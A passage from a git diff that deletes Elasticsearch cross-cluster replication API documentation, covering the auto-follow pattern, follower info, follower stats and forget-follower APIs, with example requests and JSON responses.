<>. - -[[ccr-delete-auto-follow-pattern-desc]] -==== {api-description-title} - -This API deletes a configured collection of -<>. - -[[ccr-delete-auto-follow-pattern-path-parms]] -==== {api-path-parms-title} - -``:: - (Required, string) Specifies the auto-follow pattern collection to delete. 
- - -[[ccr-delete-auto-follow-pattern-examples]] -==== {api-examples-title} - -This example deletes an auto-follow pattern collection named -`my_auto_follow_pattern`: - -[source,console] --------------------------------------------------- -DELETE /_ccr/auto_follow/my_auto_follow_pattern --------------------------------------------------- -// TEST[setup:remote_cluster] - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged" : true -} --------------------------------------------------- diff --git a/docs/reference/ccr/apis/auto-follow/get-auto-follow-pattern.asciidoc b/docs/reference/ccr/apis/auto-follow/get-auto-follow-pattern.asciidoc deleted file mode 100644 index 5ea23782e19..00000000000 --- a/docs/reference/ccr/apis/auto-follow/get-auto-follow-pattern.asciidoc +++ /dev/null @@ -1,104 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-get-auto-follow-pattern]] -=== Get auto-follow pattern API -++++ -Get auto-follow pattern -++++ - -Get auto-follow patterns. - -[[ccr-get-auto-follow-pattern-request]] -==== {api-request-title} - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /_ccr/auto_follow/my_auto_follow_pattern -{ - "remote_cluster" : "remote_cluster", - "leader_index_patterns" : - [ - "leader_index*" - ], - "follow_index_pattern" : "{{leader_index}}-follower" -} --------------------------------------------------- -// TEST[setup:remote_cluster] -// TESTSETUP - -[source,console] --------------------------------------------------- -DELETE /_ccr/auto_follow/my_auto_follow_pattern --------------------------------------------------- -// TEST -// TEARDOWN - -////////////////////////// - -[source,console] --------------------------------------------------- -GET /_ccr/auto_follow/ --------------------------------------------------- - -[source,console] --------------------------------------------------- -GET /_ccr/auto_follow/ --------------------------------------------------- -// TEST[s//my_auto_follow_pattern/] - -[[ccr-get-auto-follow-pattern-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ccr` cluster -privileges on the cluster that contains the follower index. For more information, -see <>. - -[[ccr-get-auto-follow-pattern-desc]] -==== {api-description-title} - -This API gets configured <>. -This API will return the specified auto-follow pattern collection. - -[[ccr-get-auto-follow-pattern-path-parms]] -==== {api-path-parms-title} - -``:: - (Optional, string) Specifies the auto-follow pattern collection that you want - to retrieve. If you do not specify a name, the API returns information for all - collections. 
- -[[ccr-get-auto-follow-pattern-examples]] -==== {api-examples-title} - -This example retrieves information about an auto-follow pattern collection -named `my_auto_follow_pattern`: - -[source,console] --------------------------------------------------- -GET /_ccr/auto_follow/my_auto_follow_pattern --------------------------------------------------- -// TEST[setup:remote_cluster] - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "patterns": [ - { - "name": "my_auto_follow_pattern", - "pattern": { - "active": true, - "remote_cluster" : "remote_cluster", - "leader_index_patterns" : - [ - "leader_index*" - ], - "follow_index_pattern" : "{{leader_index}}-follower" - } - } - ] -} --------------------------------------------------- diff --git a/docs/reference/ccr/apis/auto-follow/pause-auto-follow-pattern.asciidoc b/docs/reference/ccr/apis/auto-follow/pause-auto-follow-pattern.asciidoc deleted file mode 100644 index c00dd3db549..00000000000 --- a/docs/reference/ccr/apis/auto-follow/pause-auto-follow-pattern.asciidoc +++ /dev/null @@ -1,88 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-pause-auto-follow-pattern]] -=== Pause auto-follow pattern API -++++ -Pause auto-follow pattern -++++ - -Pauses an auto-follow pattern. - -[[ccr-pause-auto-follow-pattern-request]] -==== {api-request-title} - -`POST /_ccr/auto_follow//pause` - -[[ccr-pause-auto-follow-pattern-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ccr` cluster -privileges on the cluster that contains the follower index. For more information, -see <>. - -[[ccr-pause-auto-follow-pattern-desc]] -==== {api-description-title} - -This API pauses an <>. When this API returns, the auto-follow pattern -is inactive and ignores any new index created on the remote cluster that matches any of -the auto-follow's patterns. Paused auto-follow patterns appear with the `active` field -set to `false` in the <>. - -You can resume auto-following with the <>. -Once resumed, the auto-follow pattern is active again and automatically configure -follower indices for newly created indices on the remote cluster that match its patterns. -Remote indices created while the -pattern was paused will also be followed, unless they have been deleted or closed in the -meantime. - -[[ccr-pause-auto-follow-pattern-path-parms]] -==== {api-path-parms-title} - -``:: - (Required, string) Name of the auto-follow pattern to pause. 
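As a quick sketch of that behaviour (reusing the `my_auto_follow_pattern` collection from the example below), pausing a pattern and then fetching it should show the `active` field set to `false` in the get auto-follow pattern API response:

[source,console]
----
POST /_ccr/auto_follow/my_auto_follow_pattern/pause

GET /_ccr/auto_follow/my_auto_follow_pattern
----
// TEST[skip:illustrative sequence]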
- - -[[ccr-pause-auto-follow-pattern-examples]] -==== {api-examples-title} - -This example pauses an auto-follow pattern named `my_auto_follow_pattern`: -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /_ccr/auto_follow/my_auto_follow_pattern -{ - "remote_cluster" : "remote_cluster", - "leader_index_patterns" : - [ - "leader_index" - ], - "follow_index_pattern" : "{{leader_index}}-follower" -} --------------------------------------------------- -// TEST[setup:remote_cluster] -// TESTSETUP - -[source,console] --------------------------------------------------- -DELETE /_ccr/auto_follow/my_auto_follow_pattern --------------------------------------------------- -// TEST -// TEARDOWN - -////////////////////////// - -[source,console] --------------------------------------------------- -POST /_ccr/auto_follow/my_auto_follow_pattern/pause --------------------------------------------------- -// TEST - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged" : true -} --------------------------------------------------- diff --git a/docs/reference/ccr/apis/auto-follow/put-auto-follow-pattern.asciidoc b/docs/reference/ccr/apis/auto-follow/put-auto-follow-pattern.asciidoc deleted file mode 100644 index cd30494de10..00000000000 --- a/docs/reference/ccr/apis/auto-follow/put-auto-follow-pattern.asciidoc +++ /dev/null @@ -1,131 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-put-auto-follow-pattern]] -=== Create auto-follow pattern API -++++ -Create auto-follow pattern -++++ - -Creates an auto-follow pattern. - -[[ccr-put-auto-follow-pattern-request]] -==== {api-request-title} - -[source,console] --------------------------------------------------- -PUT /_ccr/auto_follow/ -{ - "remote_cluster" : "", - "leader_index_patterns" : - [ - "" - ], - "follow_index_pattern" : "" -} --------------------------------------------------- -// TEST[setup:remote_cluster] -// TEST[s//auto_follow_pattern_name/] -// TEST[s//remote_cluster/] -// TEST[s//leader_index*/] -// TEST[s//{{leader_index}}-follower/] - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE /_ccr/auto_follow/auto_follow_pattern_name --------------------------------------------------- -// TEST[continued] - -////////////////////////// - -[[ccr-put-auto-follow-pattern-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `read` and `monitor` -index privileges for the leader index patterns. You must also have `manage_ccr` -cluster privileges on the cluster that contains the follower index. For more -information, see <>. - -[[ccr-put-auto-follow-pattern-desc]] -==== {api-description-title} - -This API creates a new named collection of -<> against the remote cluster -specified in the request body. Newly created indices on the remote cluster -matching any of the specified patterns will be automatically configured as follower -indices. - -[[ccr-put-auto-follow-pattern-path-parms]] -==== {api-path-parms-title} -``:: - (Required, string) The name of the collection of auto-follow patterns. - -[[ccr-put-auto-follow-pattern-request-body]] -==== {api-request-body-title} - -`remote_cluster`:: - (Required, string) The <> containing - the leader indices to match against. 
- -`leader_index_patterns`:: - (Optional, array) An array of simple index patterns to match against indices - in the remote cluster specified by the `remote_cluster` field. - -`follow_index_pattern`:: - (Optional, string) The name of follower index. The template `{{leader_index}}` - can be used to derive the name of the follower index from the name of the - leader index. - -include::../follow-request-body.asciidoc[] - -[[ccr-put-auto-follow-pattern-examples]] -==== {api-examples-title} - -This example creates an auto-follow pattern named `my_auto_follow_pattern`: - -[source,console] --------------------------------------------------- -PUT /_ccr/auto_follow/my_auto_follow_pattern -{ - "remote_cluster" : "remote_cluster", - "leader_index_patterns" : - [ - "leader_index*" - ], - "follow_index_pattern" : "{{leader_index}}-follower", - "settings": { - "index.number_of_replicas": 0 - }, - "max_read_request_operation_count" : 1024, - "max_outstanding_read_requests" : 16, - "max_read_request_size" : "1024k", - "max_write_request_operation_count" : 32768, - "max_write_request_size" : "16k", - "max_outstanding_write_requests" : 8, - "max_write_buffer_count" : 512, - "max_write_buffer_size" : "512k", - "max_retry_delay" : "10s", - "read_poll_timeout" : "30s" -} --------------------------------------------------- -// TEST[setup:remote_cluster] - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged" : true -} --------------------------------------------------- - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE /_ccr/auto_follow/my_auto_follow_pattern --------------------------------------------------- -// TEST[continued] - -////////////////////////// diff --git a/docs/reference/ccr/apis/auto-follow/resume-auto-follow-pattern.asciidoc b/docs/reference/ccr/apis/auto-follow/resume-auto-follow-pattern.asciidoc deleted file mode 100644 index b7a26e60d32..00000000000 --- a/docs/reference/ccr/apis/auto-follow/resume-auto-follow-pattern.asciidoc +++ /dev/null @@ -1,89 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-resume-auto-follow-pattern]] -=== Resume auto-follow pattern API -++++ -Resume auto-follow pattern -++++ - -Resumes an auto-follow pattern. - -[[ccr-resume-auto-follow-pattern-request]] -==== {api-request-title} - -`POST /_ccr/auto_follow//resume` - -[[ccr-resume-auto-follow-pattern-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ccr` cluster -privileges on the cluster that contains the follower index. For more information, -see <>. - -[[ccr-resume-auto-follow-pattern-desc]] -==== {api-description-title} - -This API resumes an <> that has been paused with the -<>. When this API -returns, the auto-follow pattern will resume configuring following indices for -newly created indices on the remote cluster that match its patterns. Remote -indices created while the pattern was paused will also be followed, unless they -have been deleted or closed in the meantime. - -[[ccr-resume-auto-follow-pattern-path-parms]] -==== {api-path-parms-title} - -``:: - (Required, string) Specifies the name of the auto-follow pattern to resume. 
- - -[[ccr-resume-auto-follow-pattern-examples]] -==== {api-examples-title} - -This example resumes the activity of a paused auto-follow pattern -named `my_auto_follow_pattern`: -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /_ccr/auto_follow/my_auto_follow_pattern -{ - "remote_cluster" : "remote_cluster", - "leader_index_patterns" : - [ - "leader_index" - ], - "follow_index_pattern" : "{{leader_index}}-follower" -} --------------------------------------------------- -// TEST[setup:remote_cluster] -// TESTSETUP - -[source,console] --------------------------------------------------- -DELETE /_ccr/auto_follow/my_auto_follow_pattern --------------------------------------------------- -// TEST -// TEARDOWN - -[source,console] --------------------------------------------------- -POST /_ccr/auto_follow/my_auto_follow_pattern/pause --------------------------------------------------- -// TEST - -////////////////////////// -[source,console] --------------------------------------------------- -POST /_ccr/auto_follow/my_auto_follow_pattern/resume --------------------------------------------------- -// TEST - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged" : true -} --------------------------------------------------- diff --git a/docs/reference/ccr/apis/ccr-apis.asciidoc b/docs/reference/ccr/apis/ccr-apis.asciidoc deleted file mode 100644 index dea1f1603e4..00000000000 --- a/docs/reference/ccr/apis/ccr-apis.asciidoc +++ /dev/null @@ -1,53 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-apis]] -== {ccr-cap} APIs - -You can use the following APIs to perform {ccr} operations. - -[discrete] -[[ccr-api-top-level]] -=== Top-Level - -* <> - -[discrete] -[[ccr-api-follow]] -=== Follow - -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -[discrete] -[[ccr-api-auto-follow]] -=== Auto-follow - -* <> -* <> -* <> -* <> -* <> - -// top-level -include::get-ccr-stats.asciidoc[] - -// follow -include::follow/put-follow.asciidoc[] -include::follow/post-pause-follow.asciidoc[] -include::follow/post-resume-follow.asciidoc[] -include::follow/post-unfollow.asciidoc[] -include::follow/post-forget-follower.asciidoc[] -include::follow/get-follow-stats.asciidoc[] -include::follow/get-follow-info.asciidoc[] - -// auto-follow -include::auto-follow/put-auto-follow-pattern.asciidoc[] -include::auto-follow/delete-auto-follow-pattern.asciidoc[] -include::auto-follow/get-auto-follow-pattern.asciidoc[] -include::auto-follow/pause-auto-follow-pattern.asciidoc[] -include::auto-follow/resume-auto-follow-pattern.asciidoc[] diff --git a/docs/reference/ccr/apis/follow-request-body.asciidoc b/docs/reference/ccr/apis/follow-request-body.asciidoc deleted file mode 100644 index e474f272246..00000000000 --- a/docs/reference/ccr/apis/follow-request-body.asciidoc +++ /dev/null @@ -1,104 +0,0 @@ -[testenv="platinum"] -`settings`:: - (object) Settings to override from the leader index. Note that certain - settings can not be overrode (e.g., `index.number_of_shards`). - -`max_read_request_operation_count`:: - (integer) The maximum number of operations to pull per read from the remote - cluster. - -`max_outstanding_read_requests`:: - (long) The maximum number of outstanding reads requests from the remote - cluster. - -`max_read_request_size`:: - (<>) The maximum size in bytes of per read of a batch - of operations pulled from the remote cluster. 
- -`max_write_request_operation_count`:: - (integer) The maximum number of operations per bulk write request executed on - the follower. - -`max_write_request_size`:: - (<>) The maximum total bytes of operations per bulk write request - executed on the follower. - -`max_outstanding_write_requests`:: - (integer) The maximum number of outstanding write requests on the follower. - -`max_write_buffer_count`:: - (integer) The maximum number of operations that can be queued for writing. - When this limit is reached, reads from the remote cluster will be deferred - until the number of queued operations goes below the limit. - -`max_write_buffer_size`:: - (<>) The maximum total bytes of operations that can be - queued for - writing. When this limit is reached, reads from the remote cluster will be - deferred until the total bytes of queued operations goes below the limit. - -`max_retry_delay`:: - (<>) The maximum time to wait before retrying an - operation that failed exceptionally. An exponential backoff strategy is - employed when retrying. - -`read_poll_timeout`:: - (<>) The maximum time to wait for new operations on the - remote cluster when the follower index is synchronized with the leader index. - When the timeout has elapsed, the poll for operations will return to the - follower so that it can update some statistics. Then the follower will - immediately attempt to read from the leader again. - -===== Default values - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /follower_index/_ccr/follow?wait_for_active_shards=1 -{ - "remote_cluster" : "remote_cluster", - "leader_index" : "leader_index" -} --------------------------------------------------- -// TESTSETUP -// TEST[setup:remote_cluster_and_leader_index] - -[source,console] --------------------------------------------------- -POST /follower_index/_ccr/pause_follow --------------------------------------------------- -// TEARDOWN - -[source,console] --------------------------------------------------- -GET /follower_index/_ccr/info?filter_path=follower_indices.parameters --------------------------------------------------- - -////////////////////////// - -The following output from the follow info api describes all the default -values for the above described index follow request parameters: - -[source,console-result] --------------------------------------------------- -{ - "follower_indices" : [ - { - "parameters" : { - "max_read_request_operation_count" : 5120, - "max_read_request_size" : "32mb", - "max_outstanding_read_requests" : 12, - "max_write_request_operation_count" : 5120, - "max_write_request_size" : "9223372036854775807b", - "max_outstanding_write_requests" : 9, - "max_write_buffer_count" : 2147483647, - "max_write_buffer_size" : "512mb", - "max_retry_delay" : "500ms", - "read_poll_timeout" : "1m" - } - } - ] -} - --------------------------------------------------- diff --git a/docs/reference/ccr/apis/follow/get-follow-info.asciidoc b/docs/reference/ccr/apis/follow/get-follow-info.asciidoc deleted file mode 100644 index f98cf0f281a..00000000000 --- a/docs/reference/ccr/apis/follow/get-follow-info.asciidoc +++ /dev/null @@ -1,199 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-get-follow-info]] -=== Get follower info API -++++ -Get follower info -++++ - -Retrieves information about all follower indices. 
- -[[ccr-get-follow-info-request]] -==== {api-request-title} - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /follower_index/_ccr/follow?wait_for_active_shards=1 -{ - "remote_cluster" : "remote_cluster", - "leader_index" : "leader_index" -} --------------------------------------------------- -// TESTSETUP -// TEST[setup:remote_cluster_and_leader_index] -////////////////////////// - -[source,console] --------------------------------------------------- -GET //_ccr/info --------------------------------------------------- -// TEST[s//follower_index/] - -[[ccr-get-follow-info-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor` cluster -privileges. For more information, see <>. - -[[ccr-get-follow-info-desc]] -==== {api-description-title} - -This API lists the parameters and the status for each follower index. -For example, the results include follower index names, leader index names, -replication options and whether the follower indices are active or paused. - -[[ccr-get-follow-info-path-parms]] -==== {api-path-parms-title} - -``:: - (Required, string) A comma-delimited list of follower index patterns. - -[role="child_attributes"] -[[ccr-get-follow-info-response-body]] -==== {api-response-body-title} - -//Begin follower_indices -`follower_indices`:: -(array) An array of follower index statistics. -+ -.Properties of objects in `follower_indices` -[%collapsible%open] -==== -`follower_index`:: -(string) The name of the follower index. - -`leader_index`:: -(string) The name of the index in the leader cluster that is followed. - -//Begin parameters -`parameters`:: -(object) An object that encapsulates {ccr} parameters. If the follower index's `status` is `paused`, -this object is omitted. -+ -.Properties of `parameters` -[%collapsible%open] -===== -`max_outstanding_read_requests`:: -(long) The maximum number of outstanding read requests from the remote cluster. - -`max_outstanding_write_requests`:: -(integer) The maximum number of outstanding write requests on the follower. - -`max_read_request_operation_count`:: -(integer) The maximum number of operations to pull per read from the remote -cluster. - -`max_read_request_size`:: -(<>) The maximum size in bytes of per read of a batch of -operations pulled from the remote cluster. - -`max_retry_delay`:: -(<>) The maximum time to wait before retrying an -operation that failed exceptionally. An exponential backoff strategy is employed -when retrying. - -`max_write_buffer_count`:: -(integer) The maximum number of operations that can be queued for writing. When -this limit is reached, reads from the remote cluster are deferred until the -number of queued operations goes below the limit. - -`max_write_buffer_size`:: -(<>) The maximum total bytes of operations that can be -queued for writing. When this limit is reached, reads from the remote cluster -are deferred until the total bytes of queued operations goes below the limit. - -`max_write_request_operation_count`:: -(integer) The maximum number of operations per bulk write request executed on -the follower. - -`max_write_request_size`:: -(<>) The maximum total bytes of operations per bulk write -request executed on the follower. - -`read_poll_timeout`:: -(<>) The maximum time to wait for new operations on the -remote cluster when the follower index is synchronized with the leader index. 
-When the timeout has elapsed, the poll for operations returns to the follower so -that it can update some statistics, then the follower immediately attempts -to read from the leader again. -===== -//End parameters - -`remote_cluster`:: -(string) The <> that contains the -leader index. - -`status`:: -(string) Whether index following is `active` or `paused`. -==== -//End follower_indices - -[[ccr-get-follow-info-examples]] -==== {api-examples-title} - -This example retrieves follower info: - -[source,console] --------------------------------------------------- -GET /follower_index/_ccr/info --------------------------------------------------- - -If the follower index is `active`, the API returns the following results: - -[source,console-result] --------------------------------------------------- -{ - "follower_indices": [ - { - "follower_index": "follower_index", - "remote_cluster": "remote_cluster", - "leader_index": "leader_index", - "status": "active", - "parameters": { - "max_read_request_operation_count": 5120, - "max_read_request_size": "32mb", - "max_outstanding_read_requests": 12, - "max_write_request_operation_count": 5120, - "max_write_request_size": "9223372036854775807b", - "max_outstanding_write_requests": 9, - "max_write_buffer_count": 2147483647, - "max_write_buffer_size": "512mb", - "max_retry_delay": "500ms", - "read_poll_timeout": "1m" - } - } - ] -} --------------------------------------------------- - -//// -[source,console] --------------------------------------------------- -POST /follower_index/_ccr/pause_follow --------------------------------------------------- -// TEST[continued] - -[source,console] --------------------------------------------------- -GET /follower_index/_ccr/info --------------------------------------------------- -// TEST[continued] -//// - -If the follower index is `paused`, the API returns the following results: - -[source,console-result] --------------------------------------------------- -{ - "follower_indices": [ - { - "follower_index": "follower_index", - "remote_cluster": "remote_cluster", - "leader_index": "leader_index", - "status": "paused" - } - ] -} --------------------------------------------------- diff --git a/docs/reference/ccr/apis/follow/get-follow-stats.asciidoc b/docs/reference/ccr/apis/follow/get-follow-stats.asciidoc deleted file mode 100644 index c3017d74bd8..00000000000 --- a/docs/reference/ccr/apis/follow/get-follow-stats.asciidoc +++ /dev/null @@ -1,281 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-get-follow-stats]] -=== Get follower stats API -++++ -Get follower stats -++++ - -Get follower stats. 
- -[[ccr-get-follow-stats-request]] -==== {api-request-title} - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /follower_index/_ccr/follow?wait_for_active_shards=1 -{ - "remote_cluster" : "remote_cluster", - "leader_index" : "leader_index" -} --------------------------------------------------- -// TESTSETUP -// TEST[setup:remote_cluster_and_leader_index] - -[source,console] --------------------------------------------------- -POST /follower_index/_ccr/pause_follow --------------------------------------------------- -// TEARDOWN - -////////////////////////// - -[source,console] --------------------------------------------------- -GET //_ccr/stats --------------------------------------------------- -// TEST[s//follower_index/] - -[[ccr-get-follow-stats-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor` cluster -privileges on the cluster that contains the follower index. For more information, -see <>. - -[[ccr-get-follow-stats-desc]] -==== {api-description-title} - -This API gets follower stats. This API will return shard-level stats about the -following tasks associated with each shard for the specified indices. - -[[ccr-get-follow-stats-path-parms]] -==== {api-path-parms-title} - -``:: - (Required, string) A comma-delimited list of index patterns. - -[role="child_attributes"] -[[ccr-get-follow-stats-response-body]] -==== {api-response-body-title} - -//Begin indices -`indices`:: -(array) An array of follower index statistics. -+ -.Properties of `indices` -[%collapsible%open] -==== -`fatal_exception`:: -(object) An object representing a fatal exception that cancelled the following -task. In this situation, the following task must be resumed manually with the -<>. - -`index`:: -(string) The name of the follower index. - -//Begin shards -`shards`:: -(array) An array of shard-level following task statistics. -+ -.Properties of objects in `shards` -[%collapsible%open] -===== -`bytes_read`:: -(long) The total of transferred bytes read from the leader. -+ --- -NOTE: This is only an estimate and does not account for compression if enabled. - --- - -`failed_read_requests`:: -(long) The number of failed reads. - -failed_write_requests`:: -(long) The number of failed bulk write requests executed on the follower. - -`follower_aliases_version`:: -(long) The index aliases version the follower is synced up to. - -`follower_global_checkpoint`:: -(long) The current global checkpoint on the follower. The difference between the -`leader_global_checkpoint` and the `follower_global_checkpoint` is an -indication of how much the follower is lagging the leader. - -`follower_index`:: -(string) The name of the follower index. - -`follower_mapping_version`:: -(long) The mapping version the follower is synced up to. - -`follower_max_seq_no`:: -(long) The current maximum sequence number on the follower. - -`follower_settings_version`:: -(long) The index settings version the follower is synced up to. - -`last_requested_seq_no`:: -(long) The starting sequence number of the last batch of operations requested -from the leader. - -`leader_global_checkpoint`:: -(long) The current global checkpoint on the leader known to the follower task. - -`leader_index`:: -(string) The name of the index in the leader cluster being followed. - -`leader_max_seq_no`:: -(long) The current maximum sequence number on the leader known to the follower -task. 
-
-`operations_read`::
-(long) The total number of operations read from the leader.
-
-`operations_written`::
-(long) The number of operations written on the follower.
-
-`outstanding_read_requests`::
-(integer) The number of active read requests from the follower.
-
-`outstanding_write_requests`::
-(integer) The number of active bulk write requests on the follower.
-
-//Begin read_exceptions
-`read_exceptions`::
-(array) An array of objects representing failed reads.
-+
-.Properties of objects in `read_exceptions`
-[%collapsible%open]
-======
-`exception`::
-(object) Represents the exception that caused the read to fail.
-
-`from_seq_no`::
-(long) The starting sequence number of the batch requested from the leader.
-
-`retries`::
-(integer) The number of times the batch has been retried.
-======
-//End read_exceptions
-
-`remote_cluster`::
-(string) The <> containing the leader
-index.
-
-`shard_id`::
-(integer) The numerical shard ID, with values from 0 to one less than the
-number of replicas.
-
-`successful_read_requests`::
-(long) The number of successful fetches.
-
-`successful_write_requests`::
-(long) The number of bulk write requests executed on the follower.
-
-`time_since_last_read_millis`::
-(long) The number of milliseconds since a read request was sent to the leader.
-+
-NOTE: When the follower is caught up to the leader, this number will increase up
-to the configured `read_poll_timeout` at which point another read request will
-be sent to the leader.
-
-`total_read_remote_exec_time_millis`::
-(long) The total time reads spent executing on the remote cluster.
-
-`total_read_time_millis`::
-(long) The total time reads were outstanding, measured from the time a read was
-sent to the leader to the time a reply was returned to the follower.
-
-`total_write_time_millis`::
-(long) The total time spent writing on the follower.
-
-`write_buffer_operation_count`::
-(integer) The number of write operations queued on the follower.
-
-`write_buffer_size_in_bytes`::
-(long) The total number of bytes of operations currently queued for writing.
-===== -//End shards -==== -//End indices - -[[ccr-get-follow-stats-examples]] -==== {api-examples-title} - -This example retrieves follower stats: - -[source,console] --------------------------------------------------- -GET /follower_index/_ccr/stats --------------------------------------------------- - -The API returns the following results: - -[source,console-result] --------------------------------------------------- -{ - "indices" : [ - { - "index" : "follower_index", - "shards" : [ - { - "remote_cluster" : "remote_cluster", - "leader_index" : "leader_index", - "follower_index" : "follower_index", - "shard_id" : 0, - "leader_global_checkpoint" : 1024, - "leader_max_seq_no" : 1536, - "follower_global_checkpoint" : 768, - "follower_max_seq_no" : 896, - "last_requested_seq_no" : 897, - "outstanding_read_requests" : 8, - "outstanding_write_requests" : 2, - "write_buffer_operation_count" : 64, - "follower_mapping_version" : 4, - "follower_settings_version" : 2, - "follower_aliases_version" : 8, - "total_read_time_millis" : 32768, - "total_read_remote_exec_time_millis" : 16384, - "successful_read_requests" : 32, - "failed_read_requests" : 0, - "operations_read" : 896, - "bytes_read" : 32768, - "total_write_time_millis" : 16384, - "write_buffer_size_in_bytes" : 1536, - "successful_write_requests" : 16, - "failed_write_requests" : 0, - "operations_written" : 832, - "read_exceptions" : [ ], - "time_since_last_read_millis" : 8 - } - ] - } - ] -} --------------------------------------------------- -// TESTRESPONSE[s/"leader_global_checkpoint" : 1024/"leader_global_checkpoint" : $body.indices.0.shards.0.leader_global_checkpoint/] -// TESTRESPONSE[s/"leader_max_seq_no" : 1536/"leader_max_seq_no" : $body.indices.0.shards.0.leader_max_seq_no/] -// TESTRESPONSE[s/"follower_global_checkpoint" : 768/"follower_global_checkpoint" : $body.indices.0.shards.0.follower_global_checkpoint/] -// TESTRESPONSE[s/"follower_max_seq_no" : 896/"follower_max_seq_no" : $body.indices.0.shards.0.follower_max_seq_no/] -// TESTRESPONSE[s/"last_requested_seq_no" : 897/"last_requested_seq_no" : $body.indices.0.shards.0.last_requested_seq_no/] -// TESTRESPONSE[s/"outstanding_read_requests" : 8/"outstanding_read_requests" : $body.indices.0.shards.0.outstanding_read_requests/] -// TESTRESPONSE[s/"outstanding_write_requests" : 2/"outstanding_write_requests" : $body.indices.0.shards.0.outstanding_write_requests/] -// TESTRESPONSE[s/"write_buffer_operation_count" : 64/"write_buffer_operation_count" : $body.indices.0.shards.0.write_buffer_operation_count/] -// TESTRESPONSE[s/"follower_mapping_version" : 4/"follower_mapping_version" : $body.indices.0.shards.0.follower_mapping_version/] -// TESTRESPONSE[s/"follower_settings_version" : 2/"follower_settings_version" : $body.indices.0.shards.0.follower_settings_version/] -// TESTRESPONSE[s/"follower_aliases_version" : 8/"follower_aliases_version" : $body.indices.0.shards.0.follower_aliases_version/] -// TESTRESPONSE[s/"total_read_time_millis" : 32768/"total_read_time_millis" : $body.indices.0.shards.0.total_read_time_millis/] -// TESTRESPONSE[s/"total_read_remote_exec_time_millis" : 16384/"total_read_remote_exec_time_millis" : $body.indices.0.shards.0.total_read_remote_exec_time_millis/] -// TESTRESPONSE[s/"successful_read_requests" : 32/"successful_read_requests" : $body.indices.0.shards.0.successful_read_requests/] -// TESTRESPONSE[s/"failed_read_requests" : 0/"failed_read_requests" : $body.indices.0.shards.0.failed_read_requests/] -// TESTRESPONSE[s/"operations_read" : 
896/"operations_read" : $body.indices.0.shards.0.operations_read/] -// TESTRESPONSE[s/"bytes_read" : 32768/"bytes_read" : $body.indices.0.shards.0.bytes_read/] -// TESTRESPONSE[s/"total_write_time_millis" : 16384/"total_write_time_millis" : $body.indices.0.shards.0.total_write_time_millis/] -// TESTRESPONSE[s/"write_buffer_size_in_bytes" : 1536/"write_buffer_size_in_bytes" : $body.indices.0.shards.0.write_buffer_size_in_bytes/] -// TESTRESPONSE[s/"successful_write_requests" : 16/"successful_write_requests" : $body.indices.0.shards.0.successful_write_requests/] -// TESTRESPONSE[s/"failed_write_requests" : 0/"failed_write_requests" : $body.indices.0.shards.0.failed_write_requests/] -// TESTRESPONSE[s/"operations_written" : 832/"operations_written" : $body.indices.0.shards.0.operations_written/] -// TESTRESPONSE[s/"time_since_last_read_millis" : 8/"time_since_last_read_millis" : $body.indices.0.shards.0.time_since_last_read_millis/] diff --git a/docs/reference/ccr/apis/follow/post-forget-follower.asciidoc b/docs/reference/ccr/apis/follow/post-forget-follower.asciidoc deleted file mode 100644 index 3b2e588f9e6..00000000000 --- a/docs/reference/ccr/apis/follow/post-forget-follower.asciidoc +++ /dev/null @@ -1,155 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-post-forget-follower]] -=== Forget follower API -++++ -Forget follower -++++ - -Removes the follower retention leases from the leader. - -[[ccr-post-forget-follower-request]] -==== {api-request-title} - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /follower_index/_ccr/follow?wait_for_active_shards=1 -{ - "remote_cluster" : "remote_cluster", - "leader_index" : "leader_index" -} --------------------------------------------------- -// TESTSETUP -// TEST[setup:remote_cluster_and_leader_index] - -[source,console] --------------------------------------------------- -POST /follower_index/_ccr/pause_follow --------------------------------------------------- -// TEARDOWN - -////////////////////////// - -[source,console] --------------------------------------------------- -POST //_ccr/forget_follower -{ - "follower_cluster" : "", - "follower_index" : "", - "follower_index_uuid" : "", - "leader_remote_cluster" : "" -} --------------------------------------------------- -// TEST[s//leader_index/] -// TEST[s//follower_cluster/] -// TEST[s//follower_index/] -// TEST[s//follower_index_uuid/] -// TEST[s//leader_remote_cluster/] -// TEST[skip_shard_failures] - -[source,console-result] --------------------------------------------------- -{ - "_shards" : { - "total" : 1, - "successful" : 1, - "failed" : 0, - "failures" : [ ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"total" : 1/"total" : $body._shards.total/] -// TESTRESPONSE[s/"successful" : 1/"successful" : $body._shards.successful/] -// TESTRESPONSE[s/"failed" : 0/"failed" : $body._shards.failed/] -// TESTRESPONSE[s/"failures" : \[ \]/"failures" : $body._shards.failures/] - -[[ccr-post-forget-follower-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_leader_index` -index privileges for the leader index. For more information, see -<>. - -[[ccr-post-forget-follower-desc]] 